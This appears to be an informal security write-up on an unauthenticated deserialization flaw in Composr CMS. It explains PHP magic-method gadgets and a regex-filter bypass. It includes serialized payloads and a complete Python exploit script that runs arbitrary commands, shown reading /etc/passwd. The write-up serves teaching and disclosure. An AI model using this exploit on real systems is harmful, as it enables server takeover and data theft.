Composr CMS suffers from a remote code execution vulnerability that can be triggered without authentication. The vulnerability arises because of insufficient validation of user-supplied data that is passed to unserialize
in /sources/ajax.php
. Versions up to and including 10.0.25 are vulnerable.
This document is supposed to be an informal writeup, explaining the full process of finding and exploiting the vulnerability including all failed attempts. It was written with the goal of giving an understanding of non-trivial deserialization exploits to people not acquainted with the details of PHP exploitation.
PHP exploitation relies heavily on "dangerous" functions. These are functions that can have unwanted side-effects if called with user-supplied data as arguments. The most well-known of these are eval
, system
and unserialize
.
Finding dangerous functions is very easy, in the case of Composr CMS grepping for unserialize
finds usage of it in several places. We should quickly make sure that these calls can be reached without authentication before going on to the next step.
Now might be a good time to explain why unserialize
is dangerous. serialize
allows a programmer to take an (almost) arbitrary PHP value and turn it into a serialized string. For now it is unimportant how that string is built, we will look at the actual serialization mechanism later. This string can then for example be stored in a database or transmitted to a user.
When unserialize
is later called on this string it will recreate the original PHP value.
The following PHP code demonstrates this:
class User {
public $name;
public $id;
function __construct($name, $id) {
$this->name = $name;
$this->id = $id;
}
};
$value = [new User('Franz', 1), ['hello', 'world', 0]];
$serialized = serialize($value);
echo $serialized;
// a:2:{i:0;O:4:"User":2:{s:4:"name";s:5:"Franz";s:2:"id";i:1;}i:1;a:3:{i:0;s:5:"hello";i:1;s:5:"world";i:2;i:0;}}
// do something here
$unserialized = unserialize($serialized);
var_dump($unserialized);
/*
array(2) {
[0]=>
object(User)#2 (2) {
["name"]=>
string(5) "Franz"
["id"]=>
int(1)
}
[1]=>
array(3) {
[0]=>
string(5) "hello"
[1]=>
string(5) "world"
[2]=>
int(0)
}
}
*/
There are two big reasons why deserializing a user-supplied string is a bad idea:
Firstly, you don't have any control over the structure of the deserialized value. Code that uses unserialize
often assumes that the return value has some kind of structure. For example code might assume that the deserialized value is an array of integers. Of course, when deserializing a string chosen by an attacker this assumption can be violated. unserialize
basically gives attackers the utmost control over not only the deserialized value but also over its type.
As if that wasn't enough, unserialize
also does something way more dangerous: It has the ability to instantiate objects of all classes that are in the current scope at the time of the unserialize
call. PHP objects can have special "magic" methods. Magic methods are in most cases not called explicitly by the programmer, but implicitly by PHP itself. A quick overview of the most important magic methods:
method | called when |
---|---|
__destruct |
object falls out of current scope |
__wakeup |
object is deserialized |
__sleep |
object is serialized |
__toString |
object is used in a context where PHP implicitly converts it into a string |
__invoke |
object is used as if it were a function |
The following code shows how this can be exploited:
class Cache {
public $file;
public $data;
function __construct($file) {
$this->file = $file;
$this->data = "";
}
function addData($data) {
$this->data .= "\n" . $data;
}
function __destruct() {
// quickly save the data!
file_put_content($this->file, $this->data);
}
}
$user = unserialize($_COOKIE['user']);
Attackers can exploit this code to write arbitrary data to an arbitrary file. They do this by serializing a Cache
object with the file
and data
set to values of their choosing. This Cache
object will then be instantiated when unserialize
is called and its __destruct
method will run after the script finished executing.
We can now look at Composr CMS again and see if we can find some classes with useful magic methods.
Modern PHP applications often feature many classes that have useful magic methods. PHPGGC is a project that contains a list of classes with interesting magic methods in wide-spread libraries. It also contains code to automatically generate exploit code.
Composr CMS however doesn't use any popular library so we have to find magic methods ourselves. Grepping for __destruct
and __wakeup
doesn't find anything useful. The Tempcode
class in /sources/tempcode.php
however has a very interesting __toString
method:
class Tempcode {
// ...
public function __toString() {
return $this->evaluate();
}
// ...
public function evaluate($current_lang = null) {
$tpl_funcs = $KEEP_TPL_FUNCS;
foreach ($this->seq_parts as $seq_parts_group) {
foreach ($seq_parts_group as $seq_part) {
$seq_part_0 = $seq_part[0];
if (!isset($tpl_funcs[$seq_part_0])) {
eval($this->code_to_preexecute[$seq_part_0]);
}
}
}
}
// ...
}
This is a textbook unserialize
gadget and it is super easy to use, too. Simply create a serialized Tempcode
object in the following manner:
class Tempcode {
}
$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";
echo serialize($tp);
/*
O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}
*/
If we can get Composr CMS to unserialize this string and the resulting object gets (unintentionally) used in a context where the __toString
method will be called, we can achieve command execution.
We will focus on the ajax_tree_script
function in /sources/ajax.php
. This function will run when you access http://example.org/data/ajax_tree.php
. It is one of the functions that calls unserialize
on user input without authentication. It starts by quickly checking if the site is in maintenance mode:
function ajax_tree_script()
{
$site_closed = get_option('site_closed');
if (($site_closed == '1') && (!has_privilege(get_member(), 'access_closed_site')) && (!$GLOBALS['IS_ACTUALLY_ADMIN'])) {
header('Content-type: text/plain; charset=' . get_charset());
@exit(get_option('closed'));
}
Then sets some ajax stuff up:
prepare_for_known_ajax_response();
require_code('xml');
header('Content-Type: text/xml');
Loads a hook object that will later run a few database queries and generate the response:
$hook = filter_naughty_harsh(get_param_string('hook'));
require_code('hooks/systems/ajax_tree/' . $hook, true);
$object = object_factory('Hook_' . $hook, true);
if ($object === null) {
warn_exit(do_lang_tempcode('INTERNAL_ERROR'));
}
Gets some further options and outputs the beginning of the response:
$id = get_param_string('id', '', true);
if ($id == '') {
$id = null;
}
safe_ini_set('ocproducts.xss_detect', '0');
$html_mask = get_param_integer('html_mask', 0) == 1;
if (!$html_mask) {
echo '<?xml version="1.0" encoding="' . get_charset() . '"?' . '>';
}
echo($html_mask ? '<html>' : '<request>');
Unserializes user-supplied data ($_GET['options']
in this case) and stores it in the $options
variable:
$_options = get_param_string('options', '', true);
if ($_options == '') {
$_options = serialize(array());
}
secure_serialized_data($_options); // Ignore this (for now)
$options = @unserialize($_options);
if ($options === false) {
warn_exit(do_lang_tempcode('INTERNAL_ERROR'));
}
And finally calls the run
method on the loaded hook object and passes our unserialized input in:
$val = $object->run($id, $options, get_param_string('default', null, true));
echo str_replace('</body>', '<br id="ended" /></body>', $val);
echo($html_mask ? '</html>' : '</request>');
exit();
}
Reading the code we have control over which hook object is loaded (via the $_GET['hook']
parameter) and of course we have full control over the $options
value. All of the hook objects we could use here work basically the same. We'll go with the Hook_choose_catalogue_entry
class. Here is its run
method:
public function run($id, $options, $default = null)
{
require_code('catalogues');
$only_owned = array_key_exists('only_owned', $options) ? (is_null($options['only_owned']) ? null : intval($options['only_owned'])) : null;
$catalogue_name = array_key_exists('catalogue_name', $options) ? $options['catalogue_name'] : null;
$editable_filter = array_key_exists('editable_filter', $options) ? ($options['editable_filter']) : false;
$tree = get_catalogue_entries_tree($catalogue_name, $only_owned, is_null($id) ? null : intval($id), null, null, is_null($id) ? 0 : 1, $editable_filter);
/* The rest from here on is unimportant */
This code assumes that $options
is an array containing strings and integers. It tries to get a few values out of the array and passes them to a function called get_catalogue_entries_tree
. This function will then execute a SQL query containing the $catalogue_name
value thereby implicitly converting it to a string!
This means that we found a way to get the script to call the __toString
function on our serialized object! The only thing left to do is to build the exploit:
The url we have to access is http://example.org/data/ajax_tree.php
. To use the Hook_choose_catalogue_entry
class we need to set the hook
parameter to choose_catalogue_entry
. Now we need to build the serialized options
parameter. It should be an array that contains our Tempcode
gadget. Let's fire up PHP to generate it:
class Tempcode {
}
$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";
$options = ['catalogue_name' => $tp];
echo serialize($options);
/*
a:1:{s:14:"catalogue_name";O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}
*/
Our exploit then looks like this:
#!/usr/bin/env python3
import requests
def exploit(base_url):
payload = {'hook': 'choose_catalogue_entry',
'options': 'a:1:{s:14:"catalogue_name";O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}'}
return requests.get("{}/data/ajax_tree.php".format(base_url), params=payload)
exploit('http://example.org')
Let's execute it and have a look at the output:
$ python3 composr_exploit.py
<?xml version="1.0" encoding="utf-8"?><request>
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
...
Well, that doesn't look like ls
at all...
What we got back was a HTML document telling us that a PHP warning has been raised and that execution has been stopped. The error message says something about array_key_exists
expecting an array and not getting one. The reason array_key_exists
didn't get our deserialized array is because our serialized string has been tampered with! Directly before the call to unserialize
another function is called. A function that (supposedly) checks the serialized string for dangerous objects: secure_serialized_data
. It is defined in /sources/global3.php
and we will soon take a look at what exactly it does. If you plan on exploiting deserialization vulnerabilities this is a situation you will probably find yourself in more than once. Don't worry, the serialization mechanism PHP uses is quite complicated and many of these handcrafted validation routines are easy to outsmart. To do this we should familiarize ourselves with the PHP serialization mechanism:
This is how basic types get serialized:
type | serialized | example |
---|---|---|
null | N; |
N; |
boolean | b:<boolean as integer>; |
b:1; |
integer | i:<number>; |
i:5; |
string | s:<number of characters>:"<string>"; |
s:5:"hello"; |
float | d:<float>; |
d:5.4; |
Note that if a string gets serialized it won't get escaped. So She said "hello" to me
will get serialized to s:22:"She said "hello" to me";
.
Now for the more complex types:
Arrays get serialized to a:<number of elements>:{<list of elements>}
where the <list of elements>
is just a list of all serialized <key><element>
-pairs. [0 => "a", 1 => "b", 2 => "c"]
is therefore serialized to a:3:{i:0;s:1:"a";i:1;s:1:"b";i:2;s:1:"c";}
.
Finally objects get serialized to O:<number of characters in the class name>:"<class name>":<number of class members>:{<list of class members>}
where <list of class members>
is serialized just like array elements (except of course that the keys must be strings here). Here is an example:
class HelloWorld {
public $a;
public $b;
}
$hello = new HelloWorld();
$hello->a = "a";
$hello->b = 1;
echo serialize($hello);
// O:10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}
Now that we know about the basic structure of serialized strings we can take a look at the secure_serialization_data
function that currently blocks our attempt to gain code execution.
// Cleaned up so it's easier to read
function secure_serialized_data(&$serialized_data)
{
$matches = array();
$num_matches = preg_match_all('#(^|;)O:\d+:"([^"]+)"#', $serialized_data, $matches);
for ($i = 0; $i < $num_matches; $i++) {
$methods = get_class_methods($matches[2][$i]);
foreach ($methods as $method) {
if (preg_match('#^__.*$#', $method) != 0) {
$serialized_data = serialize(null);
return;
}
}
}
}
This function takes our serialized string and uses a regex to search for the occurence of O:<some number here>:"<class name>"
. It then takes whatever string was at <class name>
and calls get_class_methods
on it, iterates over the class methods and if one of these methods is a magic method it substitutes our $serialized_data
string with a completely safe replacement.
It turns out that PHPs serialization language is context-sensitive (you could actually argue that it's a type-0 grammar) and regex can only parse regular languages. This means that there have to be cases where the regex and PHPs unserialize
disagree on how to understand the input. These disagreements are called parser differentials. Our goal now is to find an input that exploits a parser differential in order to bypass the regex check.
unserialize
used to allow an superfluous +
in some places:
O:+10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}
^
This makes it possible to completely bypass secure_serialized_data
. It has one drawback though: It doesn't work for PHP 7.2 anymore.
Well, we can serialize arbitrary strings. Having a little fun with that poor regex is almost obligatory:
class HelloWorld {
}
$serialized_data = serialize([";O:2:" => new HelloWorld()]);
echo $serialized_data;
// a:1:{s:5:";O:2:";O:10:"HelloWorld":0:{}};
// ^ ^
// match begin end
//
// And since subsequent matches are continued from
// the end of the last match no further match is found
$matches = array();
$num_matches = preg_match_all('#(^|;)O:\d+:"([^"]+)"#', $serialized_data, $matches);
for ($i = 0; $i < $num_matches; $i++) {
echo $matches[2][$i];
}
The regex now parses ;O:10:
as the class name of an object and more importantly it doesn't find our HelloWorld
object anymore!
This is a classic parser differential that arises because regular languages are just not powerful enough to parse strings serialized with PHPs serialization mechanism.
Sadly, it's of no use to us, because secure_serialized_data
will go on to call get_class_methods
on ;O:10:
which will return null
. And the following code then tries to iterate over null
raising a warning and halting the execution. The thing stopping us here is the (admittedly good) security practice of stopping the execution on PHP warnings.
Now, we want this to work for PHP 7.2 and we're kinda getting desperate. Luckily, it turns out that the serialization format has some features we haven't talked about yet:
- Objects that implement the
Serializable
interface - References
Objects that implement the Serializable
interface contain two methods serialize
and unserialize
. When serializing such an object a string of the following format will be returned: C:<number of characters in the class name>:"<class name>":<length of the output of the serialize method>:{<output of the serialize method>}
. Creating a serialized string in this format for an object of a class that doesn't implement Serializable
will work but the deserialized object will not have any class members set. It is thus not very useful for our purposes but it does lead the way to a final working exploit:
There are a few PHP classes implementing Serializable
, the most important of which (for our purposes here) is SplDoublyLinkedList
. This is the important part of the C code that handles serialization for SplDoublyLinkedList
:
/* flags */
ZVAL_LONG(&flags, intern->flags);
php_var_serialize(&buf, &flags, &var_hash);
/* elements */
while (current) {
smart_str_appendc(&buf, ':');
next = current->next;
php_var_serialize(&buf, ¤t->data, &var_hash);
current = next;
}
It shows that the elements of a SplDoublyLinkedList
are serialized just like serialize
would serialize them but they are separated by colons. This provides us with a way to bypass the regex:
class HelloWorld {
}
$dll = new SplDoublyLinkedList();
$dll->push(new HelloWorld());
$dll->push(42);
$serialized_data = serialize($dll);
echo $serialized_data;
// C:19:"SplDoublyLinkedList":33:{i:0;:O:10:"HelloWorld":0:{}:i:42;}
// ^
// This prevents the regex from matching
Now this by itself isn't really helpful. SplDoublyLinkedList
doesn't implement __toString
and although array operators work on it keys have to be numeric so $dll['catalogue_name']
doesn't work either. We can now get our gadget deserialized without triggering secure_serialized_data
but we need a new way to call __toString
on it.
There is one last thing about the serialization format we haven't talked about: It allows references. If you serialize the same object (not just a copy) twice, the object won't be serialized two times. Instead serialize
will just store a reference. Here's a quick example:
class HelloWorld {
}
$a = new HelloWorld();
$serialized_data = serialize([$a, $a]);
echo $serialized_data;
// a:2:{i:0;O:10:"HelloWorld":0:{}i:1;r:2;}
// ^
// This is the reference
We can now use this to build a new exploit that bypasses secure_serialized_data
but still executes our code:
class Tempcode {
}
$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";
$dll = new SplDoublyLinkedList();
$dll->push($tp);
$options = [0 => $dll, 'catalogue_name' => $tp];
echo serialize($options);
/*
a:2:{i:0;C:19:"SplDoublyLinkedList":166:{i:0;:O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}s:14:"catalogue_name";r:4;}
*/
This exploit uses a bit of trickery: The malicious TempCode
object is stored in the SplDoublyLinkedList
to evade detection by the regex, but a reference to this TempCode
object is used outside of the SplDoublyLinkedList
, allowing us to use the discovered vulnerability where __toString
is called on the array element with the key catalogue_name
!
Here is the final exploit:
#!/usr/bin/env python3
import requests
import argparse
def exploit(base_url, cmd):
payload = {'hook': 'choose_catalogue_entry', 'cmd': cmd, 'options': 'a:2:{i:0;C:19:"SplDoublyLinkedList":152:{i:0;:O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:0:"";}}}s:18:"code_to_preexecute";a:1:{s:0:"";s:28:"system($_GET["cmd"]);exit();";}}}s:14:"catalogue_name";r:4;}'}
return requests.get("{}/data/ajax_tree.php".format(base_url), params=payload).text[47:]
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Remote code execution on composr cms')
parser.add_argument('url', help='base url of the composr installation')
parser.add_argument('cmd', help='command to execute')
args = parser.parse_args()
print(exploit(args.url, args.cmd))
And one final test:
$ python3 composr_exploit.py http://localhost "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
...